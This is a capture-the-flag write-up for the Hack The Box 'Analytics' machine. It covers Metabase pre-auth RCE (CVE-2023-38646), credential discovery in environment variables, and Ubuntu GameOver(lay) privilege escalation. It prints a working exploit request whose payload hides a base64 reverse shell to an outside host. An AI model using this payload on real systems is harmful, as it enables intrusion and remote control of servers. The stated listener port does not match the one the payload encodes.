This is an Ubuntu 22.04 host running an HTTP server on port 80. The vulnerable web application running is Metabase, and using the appropriate exploit RCE can be gained. For escalation, a kernel vulnerability is abused.
Browsing the hidden subdomain at http://data.analitycal.htb we find a login portal for a Metabase service.
Searching for Metabase vulnerabilities we find out there is a vulnerability (https://www.cvedetails.com/cve/CVE-2023-38646) in the /api/setup/validate endpoint, which can lead to RCE.
USER
Search for a PoC in GitHub: https://github.com/securezeron/CVE-2023-38646. Analyzing it, we see first step is to obtain setup token, for this, just query the /api/session/properties endpoint and find setup-token field. Then, to obtain RCE, we query the api/setup/validate endpoint with the setup token and the appropriate payload.
We can do this ourselves with Burpsuite.
So the setup token is "setup-token" : "249fa03d-fd94-4d5b-b94f-b4ebf3df681f". For the payload, just use a base64 sh -i shell and query the endpoint building a post request with Burpsuite.
POST /api/setup/validate HTTP/1.1Host:data.analytical.htbContent-Type:application/jsonContent-Length:818{ "token":"249fa03d-fd94-4d5b-b94f-b4ebf3df681f","details": {"is_on_demand":false,"is_full_sync":false,"is_sample":false,"cache_ttl":null,"refingerprint":false,"auto_run_queries":true,"schedules": {},"details": {"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjEvMTkxOSAwPiYxCg==}|{base64,-d}|{bash,-i}')\n$$--=x","advanced-options":false,"ssl":true },"name":"an-sec-research-team","engine":"h2" }}
If this does not work, just use the PoC with the shell hardcoded in base64 within the source code.
After issuing the exploit, a sh shell is received on port 9001. Enumerate the system.
> uname -a &&cat/etc/os-releaseLinuxbefd7ac0fb416.2.0-25-generic#25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 LinuxNAME="Alpine Linux"ID=alpineVERSION_ID=3.18.2PRETTY_NAME="Alpine Linux v3.18"> whoami &&idmetabaseuid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
We are in some kind of limited Ubuntu system, maybe a container. Looking around we find a script /app/run_metabase.sh to start the database where some environmental variables are manipulated, so let's enumerate with env
Clear text credentials are found here. So we can just login using them.
> ssh metalytics@$target metalytics@10.129.136.15's password:Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64)Last login: Sat Oct 7 23:19:29 2023 from 10.10.14.80metalytics@analytics:~$
This is a low-priv shell enough to retrieve user flag.
SYSTEM
Now we have a full shell out of the container, enumerate system again.
> uname -a &&cat/proc/versionLinuxanalytics6.2.0-25-generic#25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/LinuxLinuxversion6.2.0-25-generic (buildd@lcy02-amd64-044) (x86_64-linux-gnu-gcc-11 (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, GNU ld (GNUBinutilsforUbuntu) 2.38) #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2
Notice the system is Ubuntu 22.04 and kernel is 6.2.0. This release is vulnerable to GameOver(lay) Ubuntu Privilege Escalation (CVE-2023-2640 and CVE-2023-32629).
